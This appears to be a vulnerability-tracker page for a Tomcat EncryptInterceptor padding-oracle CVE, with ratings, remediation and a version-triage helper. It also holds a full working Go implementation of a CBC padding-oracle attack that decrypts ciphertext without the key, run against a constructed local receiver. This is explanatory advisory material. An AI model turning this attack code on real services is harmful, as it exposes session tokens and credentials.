
Tomcat CVE-2026-29146

EUVD-2026-21012 · HIGH 7.5 (CVSS 3.1) · Vendor: apache
Error Message Information Leak (CWE-209)
2026-04-09 · apache · GHSA-h468-7pvh-8vr8

Severity by source

Vendor (apache), primary: 7.5 HIGH, AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
SUSE: HIGH (qualitative)
Red Hat: 7.5 HIGH (qualitative)

Primary rating from Vendor (apache).

CVSS Vector (Vendor: apache)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: None
Availability: None

Lifecycle Timeline

Apr 09, 2026 - 19:21  CVE Published (nvd)
Apr 09, 2026 - 19:45  EUVD ID Assigned: EUVD-2026-21012 (euvd)
Apr 09, 2026 - 19:45  Analysis Generated (vuln.today)
Apr 11, 2026 - 02:30  Patch released, patch available (nvd)

Blast Radius

Ecosystem impact (transitive dependency graph resolved to a depth of 4):
  • 442 maven packages depend on org.apache.tomcat.embed:tomcat-embed-core (33 direct, 409 indirect)
  • 20 maven packages depend on org.apache.tomcat:tomcat-catalina (8 direct, 12 indirect)
  • 9 maven packages depend on org.apache.tomcat:tomcat-tribes (3 direct, 6 indirect)

Ecosystem-wide dependent count for version 9.0.13 and other introduced versions.

Description (CVE.org)

Padding Oracle vulnerability in Apache Tomcat's EncryptInterceptor with default configuration.

This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.18, from 10.0.0-M1 through 10.1.52, from 9.0.13 through 9.0.115, from 8.5.38 through 8.5.100, from 7.0.100 through 7.0.109.

Users are recommended to upgrade to version 11.0.19, 10.1.53 or 9.0.116, which fix the issue.

Analysis (AI)

Padding oracle attack against Apache Tomcat's EncryptInterceptor, the Tribes cluster-channel interceptor that encrypts replication traffic between cluster members. With the interceptor's default cipher settings (a CBC mode with PKCS#5 padding, the combination a padding oracle requires), an unauthenticated attacker who can reach the cluster channel and observe how a member reacts to malformed padding can decrypt intercepted messages, including replicated session data, without the key and without any credentials (CVSS:3.1 AV:N/AC:L/PR:N). Affected versions: 7.0.100 through 7.0.109, 8.5.38 through 8.5.100, 9.0.13 through 9.0.115, 10.0.0-M1 through 10.1.52, and 11.0.0-M1 through 11.0.18. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Access
Reach the Tribes cluster channel and deliver messages to a member running EncryptInterceptor
Delivery
Submit ciphertext with a modified preceding block and observe whether the receiver reports a padding failure (through the error message or a timing difference)
Exploit
Use that one-bit answer as an oracle to deduce the padding bytes, then each earlier byte of the block
Execution
Repeat per block to decrypt intercepted replication traffic, including session data
Impact
Confidentiality of replicated data is compromised; integrity and availability are not affected (I:N/A:N)

Vulnerability Assessment (AI)

Exploitation Remote unauthenticated attacker against Apache Tomcat 7.0.100–7.0.109, 8.5.38–8.5.100, 9.0.13–9.0.115, 10.0.0-M1–10.1.52, or 11.0.0-M1–11.0.18 with EncryptInterceptor configured in the cluster channel using its default cipher settings. Clustering and the interceptor are not enabled in a stock Tomcat install, so deployments without them are not exposed by this CVE. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Unauthenticated padding oracle attack on Tomcat EncryptInterceptor enables a confidentiality breach with high impact (CVSS 7.5); integrity and availability are not affected. …
Exploit Scenario An attacker with network reach to the cluster channel sends crafted ciphertext to a member running EncryptInterceptor, observes the error or timing difference between a padding failure and any other failure, and iteratively decrypts intercepted traffic (session tokens and any credentials held in replicated session state). No public exploit identified at time of analysis; network-level access to the cluster channel, not merely to the HTTP port, is required.
Remediation Vendor-released patch: upgrade to Apache Tomcat 11.0.19, 10.1.53, or 9.0.116. No fixed release is listed for the 8.5.x and 7.0.x lines, which are affected through 8.5.100 and 7.0.109; move those deployments to a supported line. …
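The attack the assessment and the attack chain above describe, as an added example that is not Tomcat's code and is not derived from the vendor patch: a Go model of an AES/CBC/PKCS5Padding receiver that reports a padding failure differently from every other failure, the one-bit oracle an attacker builds on that distinction, and the block-by-block recovery of the plaintext with no key. The sample plaintext, the fixed demo key and all function names are constructed for this example; the receiver is a deliberately simplified stand-in for the interceptor, not its implementation.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
)

// Two distinguishable failures: being able to tell them apart is the oracle (CWE-209).
var (
	errPadding = errors.New("bad padding")
	errGeneric = errors.New("decryption failed")
)

// Constructed sample standing in for a replicated-session payload, plus a demo-only fixed key.
var samplePlaintext = []byte("session replica: JSESSIONID=demo-only-value-0001")
var demoBlock, _ = aes.NewCipher([]byte("0123456789abcdef"))

// cbcEncrypt returns iv||ciphertext under AES/CBC/PKCS5Padding with a fresh random IV.
func cbcEncrypt(block cipher.Block, pt []byte) []byte {
	n := aes.BlockSize - len(pt)%aes.BlockSize
	padded := append(append([]byte{}, pt...), bytes.Repeat([]byte{byte(n)}, n)...)
	iv, out := make([]byte, aes.BlockSize), make([]byte, len(padded))
	rand.Read(iv) // crypto/rand.Read never returns an error as of Go 1.24
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, padded)
	return append(iv, out...)
}

func pkcs5Unpad(p []byte) ([]byte, error) {
	if len(p) == 0 {
		return nil, errPadding
	}
	n := int(p[len(p)-1])
	if n == 0 || n > aes.BlockSize || n > len(p) || !bytes.Equal(p[len(p)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errPadding
	}
	return p[:len(p)-n], nil
}

// cbcDecryptLeaky is the weak side: a padding failure is reported differently from every other failure.
func cbcDecryptLeaky(block cipher.Block, msg []byte) ([]byte, error) {
	if len(msg) < 2*aes.BlockSize || len(msg)%aes.BlockSize != 0 {
		return nil, errGeneric
	}
	pt := make([]byte, len(msg)-aes.BlockSize)
	cipher.NewCBCDecrypter(block, msg[:aes.BlockSize]).CryptBlocks(pt, msg[aes.BlockSize:])
	return pkcs5Unpad(pt)
}

// leakyOracle is all the attacker gets: one bit, "did the padding check pass?".
func leakyOracle(block cipher.Block) func([]byte) bool {
	return func(m []byte) bool { _, err := cbcDecryptLeaky(block, m); return err != errPadding }
}

// confirmLast re-queries with the second-to-last forged byte flipped, so a 0x02-or-longer padding that validated by chance is rejected.
func confirmLast(query []byte, oracle func([]byte) bool) bool {
	query[aes.BlockSize-2] ^= 0xff
	ok := oracle(query)
	query[aes.BlockSize-2] ^= 0xff
	return ok
}

// paddingOracleAttack recovers the plaintext of iv||ct with at most 257 oracle queries per byte and no key (Vaudenay's CBC attack).
func paddingOracleAttack(msg []byte, oracle func([]byte) bool) []byte {
	bs := aes.BlockSize
	var plain []byte
	for blk := bs; blk+bs <= len(msg); blk += bs {
		query := make([]byte, 2*bs) // forged "IV" block followed by the target block
		copy(query[bs:], msg[blk:blk+bs])
		forged, inter := query[:bs], make([]byte, bs) // inter = D_k(target), filled right to left
		for i := bs - 1; i >= 0; i-- {
			pad := byte(bs - i)
			for j := i + 1; j < bs; j++ {
				forged[j] = inter[j] ^ pad // known bytes forced to decrypt to the pad value
			}
			for g := 0; g < 256; g++ {
				forged[i] = byte(g)
				if oracle(query) && (i < bs-1 || confirmLast(query, oracle)) {
					inter[i] = byte(g) ^ pad
					break
				}
			}
		}
		for i := range inter {
			plain = append(plain, inter[i]^msg[blk-bs+i]) // P = D_k(C) xor previous ciphertext block
		}
	}
	if out, err := pkcs5Unpad(plain); err == nil {
		return out
	}
	return plain
}

func main() {
	fmt.Printf("%q\n", paddingOracleAttack(cbcEncrypt(demoBlock, samplePlaintext), leakyOracle(demoBlock)))
}
```

Run it with `go run`. The 48-byte sample is block-aligned, so it carries a full 16-byte padding block; the attack recovers that block too and strips it, issuing at most 257 queries per byte. The defence is structural rather than cosmetic: identical error text is not enough while timing still differs, so in your own code authenticate the ciphertext before decrypting (an AEAD such as AES-GCM, or encrypt-then-MAC with a constant-time tag check) and return one error for every failure; for Tomcat itself, apply the vendor upgrade.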

Recommended Action (AI)

Within 24 hours: identify all Tomcat deployments on versions 7.0.100–7.0.109, 8.5.38–8.5.100, 9.0.13–9.0.115, 10.0.0-M1–10.1.52, or 11.0.0-M1–11.0.18, document the active instances, and record for each whether server.xml configures EncryptInterceptor in a cluster channel, since only those are exposed. …
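A triage helper for the step above, added here and not part of vuln.today's or Tomcat's tooling: it reads server.number from ServerInfo.properties (the file inside lib/catalina.jar that `catalina.sh version` reports from), compares it against the affected ranges listed in the description, including the -M milestone builds, and does a coarse text check for the EncryptInterceptor class name in server.xml, since the issue is only reachable where that interceptor is configured. The two sample files and the fixedIn table are constructed from this page; the exact element layout of the sample Cluster/Channel/Interceptor snippet is an assumption to check against your Tomcat version's cluster documentation.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// Constructed samples standing in for org/apache/catalina/util/ServerInfo.properties (inside lib/catalina.jar) and conf/server.xml.
const sampleServerInfo = "server.info=Apache Tomcat/9.0.115\nserver.number=9.0.115.0\n"

const sampleServerXML = `<Cluster className="org.apache.catalina.ha.tcp.SimpleTcpCluster">
  <Channel className="org.apache.catalina.tribes.group.GroupChannel">
    <Interceptor className="org.apache.catalina.tribes.group.interceptors.EncryptInterceptor"/>
  </Channel>
</Cluster>`

// tomcatVersion is [major, minor, patch, milestone]; a final release carries milestone 1<<30 so "11.0.0-M1" sorts before "11.0.0".
type tomcatVersion [4]int

// parseTomcatVersion accepts "9.0.115", the four-part server.number form "9.0.115.0", and milestone tags such as "11.0.0-M1".
func parseTomcatVersion(s string) (tomcatVersion, error) {
	v := tomcatVersion{0, 0, 0, 1 << 30}
	s = strings.TrimSpace(s)
	if i := strings.Index(s, "-M"); i >= 0 {
		m, err := strconv.Atoi(strings.Split(s[i+2:], ".")[0])
		if err != nil || m <= 0 {
			return v, fmt.Errorf("bad milestone in %q", s)
		}
		v[3], s = m, s[:i]
	}
	parts := strings.Split(s, ".")
	if len(parts) < 3 {
		return v, fmt.Errorf("bad version %q", s)
	}
	for i := 0; i < 3; i++ {
		n, err := strconv.Atoi(parts[i])
		if err != nil {
			return v, fmt.Errorf("bad version %q", s)
		}
		v[i] = n
	}
	return v, nil
}

func (a tomcatVersion) less(b tomcatVersion) bool {
	for i := range a {
		if a[i] != b[i] {
			return a[i] < b[i]
		}
	}
	return false
}

// affectedRanges and fixedIn come from the CVE description; the 8.5.x and 7.0.x lines are affected with no fixed release listed.
var affectedRanges = [][2]string{
	{"11.0.0-M1", "11.0.18"}, {"10.0.0-M1", "10.1.52"}, {"9.0.13", "9.0.115"},
	{"8.5.38", "8.5.100"}, {"7.0.100", "7.0.109"},
}

var fixedIn = map[int]string{11: "11.0.19", 10: "10.1.53", 9: "9.0.116"}

// isAffected reports whether version falls in a listed range and the fixed release on that line ("" when none is listed).
func isAffected(version string) (bool, string, error) {
	v, err := parseTomcatVersion(version)
	if err != nil {
		return false, "", err
	}
	for _, r := range affectedRanges {
		lo, _ := parseTomcatVersion(r[0])
		hi, _ := parseTomcatVersion(r[1])
		if !v.less(lo) && !hi.less(v) {
			return true, fixedIn[v[0]], nil
		}
	}
	return false, "", nil
}

// serverNumber extracts the server.number value from ServerInfo.properties content.
func serverNumber(props string) string {
	for _, line := range strings.Split(props, "\n") {
		line = strings.TrimSpace(line)
		if strings.HasPrefix(line, "server.number=") {
			return strings.TrimSpace(strings.TrimPrefix(line, "server.number="))
		}
	}
	return ""
}

// usesEncryptInterceptor is a coarse text check on server.xml: the issue is only reachable where this interceptor is configured.
func usesEncryptInterceptor(serverXML string) bool {
	return strings.Contains(serverXML, "org.apache.catalina.tribes.group.interceptors.EncryptInterceptor")
}

func main() {
	ver := serverNumber(sampleServerInfo)
	affected, fix, err := isAffected(ver)
	fmt.Printf("version %s affected=%v fixedIn=%q err=%v interceptor=%v\n", ver, affected, fix, err, usesEncryptInterceptor(sampleServerXML))
}
```

Point it at the real files by unzipping ServerInfo.properties out of lib/catalina.jar and reading conf/server.xml; a hit on both checks is an exposed instance, a hit on the version alone is an upgrade candidate that is not reachable through this CVE. Embedded Tomcat (tomcat-embed-core) has no server.xml, so for those deployments check the dependency version and whether the application configures the interceptor programmatically.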



Vendor Status

SUSE (severity: High)
openSUSE Tumbleweed: Fixed
SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS: Affected
SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS: Affected
SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS: Affected
SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS: Affected
